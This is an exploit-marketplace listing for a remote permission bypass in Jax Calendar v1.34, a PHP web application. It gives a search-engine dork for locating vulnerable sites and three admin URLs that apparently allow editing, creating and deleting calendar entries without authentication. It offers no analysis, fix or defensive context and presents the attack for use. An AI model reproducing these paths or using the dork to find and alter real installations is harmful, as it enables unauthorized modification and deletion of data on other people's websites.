[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Jax Calendar v1.34 Remote Permission Bypass Vulnerability

Author
R4M!
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12401
Category
web applications
Date add
26-05-2010
Platform
php
=========================================================
Jax Calendar v1.34 Remote Permission Bypass Vulnerability
=========================================================


###############################
FOUND BY: R4M! - Rami@live.de
###############################


DORK: inurl:?do=edit_entry


SCRIPT: Jax Calendar v1.34 by Jack (tR), http://www.jtr.de/scripting/php


EXAMPLE:
1. /admin/calendar.admin.php?do=edit_entry
2. /admin/calendar.admin.php?do=new_entry
3. /admin/calendar.admin.php?do=delete_entry


########################################
Special Greetz to: (APOCAN/VURAL/жMER)
########################################



#  0day.today [2024-07-04]  #